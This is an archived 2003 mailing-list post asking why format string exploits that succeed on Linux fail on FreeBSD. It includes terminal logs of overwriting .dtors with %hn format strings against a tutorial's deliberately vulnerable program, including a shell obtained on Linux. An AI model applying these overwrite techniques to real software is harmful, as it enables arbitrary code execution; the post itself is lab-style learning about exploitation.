Pantek Library

Formatstrings on *BSD

From: <Vail(at)gmx.net>
Date: Wed Jun 18 2003 - 10:38:48 EDT


Hi folks, I have a question about format string attacks and the difference between the Linux and *BSD stack. I can manage
to exploit some vulnerable programs on Linux, but every attempt to exploit the same on FreeBSD, for example, fails.

The only thing I could imagine is that the stack behaviour is somewhat different, so that for example
the build*.c from
http://www.linuxfocus.org/English/July2001/article191.shtml would produce format strings that are not compliant with FreeBSD... Anyone have a guess where the difference in exploiting format strings is? Or some good URL/doc regarding
specifics on *BSD and format string attacks?

First, here is what I did on Linux (using the vuln.c from the link above):

-------------------------------linux-------------------------------
admin@linux:~> objdump -s -j .dtors vuln

vuln: file format elf32-i386

Contents of section .dtors:

 8049a64 ffffffff 00000000                    ........

admin@linux:~> ./bui2 8049a68 8
Calling ./bui2 ...

adr : 134519400 (8049a68)
val : -1073744136 (bffff6f8)
valh: 49151 (bfff)
vall: 63224 (f6f8)

[%.49143x%8$hn%.14073x%9$hn] (34)
Calling ./vuln ...
sc = 0xbffff8be
adr : 134519400 (8049a68)
val : -1073743682 (bffff8be)
valh: 49151 (bfff)
vall: 63678 (f8be)

[%.49143x%8$hn%.14527x%9$hn] (34)
0 0xbffff894
1 0xbffff89b
2 0xbffff8be
3 0xbffff8ec
4 0xbffff8f4
helloWorld() = 0x8048770
accessForbidden() = 0x80487b0

before : ptrf() = 0x8048770 (0xbffff5fc) buffer =

[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127)
after : ptrf() = 0x8048770 (0xbffff5fc)
Welcome in "helloWorld"
sh-2.05$
-------------------------------linux-------------------------------

Works quite fine ;)
Now, I changed the shellcode of build2 to FreeBSD shellcode and tried to exploit it:

-------------------------------freebsd-------------------------------
> objdump -s -j .dtors vuln

vuln: file format elf32-i386

Contents of section .dtors:

 8049958 ffffffff 00000000                    ........

> ./bui2 804995c 8

Calling ./bui2 ...
adr : 134519132 (804995c)
val : -1077937316 (bfbffb5c)
valh: 49087 (bfbf)
vall: 64348 (fb5c)

[%.-16457x%8$hn%.15261x%9$hn] (35)
Calling ./vuln ...
sc = 0xbfbffc9f
adr : 134519132 (804995c)
val : -1077936993 (bfbffc9f)
valh: 49087 (bfbf)
vall: 64671 (fc9f)

[%.-16457x%8$hn%.15584x%9$hn] (35)
0 0xbfbffc74
1 0xbfbffc7b
2 0xbfbffc9f
3 0xbfbffce4
4 0xbfbffcec
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffa74)

buffer = [2805f000                                                          
                                                    ] (127)
after : ptrf() = 0x8048770 (0xbfbffa74)
Welcome in "helloWorld"
Segmentation fault (core dumped)
-------------------------------freebsd-------------------------------

I can try what I want (change values, shellcode, padding); it never executes a shell...

What I found out myself is that some values to write with %n seem to trouble FreeBSD.
For example, I wanted to write my shellcode address to 0xbfbffa74 (the address of the pointer); on
Linux this works fine, on FreeBSD I get *strange* values after writing to 0xbfbffa74:

> ./bui2 0xbfbffa74 8

Calling ./bui2 ...

adr : -1077937548 (bfbffa74)
val : -1077937320 (bfbffb58)
valh: 49087 (bfbf)
vall: 64344 (fb58)

[vú¿¿tú¿¿%.-16457x%8$hn%.15257x%9$hn] (35)
Calling ./vuln ...
sc = 0xbfbffc9f
adr : -1077937548 (bfbffa74)
val : -1077936993 (bfbffc9f)
valh: 49087 (bfbf)
vall: 64671 (fc9f)

[vú¿¿tú¿¿%.-16457x%8$hn%.15584x%9$hn] (35)
0 0xbfbffc74
1 0xbfbffc7b
2 0xbfbffc9f
3 0xbfbffce4
4 0xbfbffcef
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffa74)

buffer = [vú¿¿tú¿¿2805f000                                                  
                                                            ] (127)
after : ptrf() = 0x40517d31 (0xbfbffa74) // 0x40517d31 !? THAT'S surely NOT my shellcode address (it's sc = 0xbfbffc9f)
Segmentation fault (core dumped)

Anyone have a clue?

Received on Wed Jun 18 13:40:45 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT

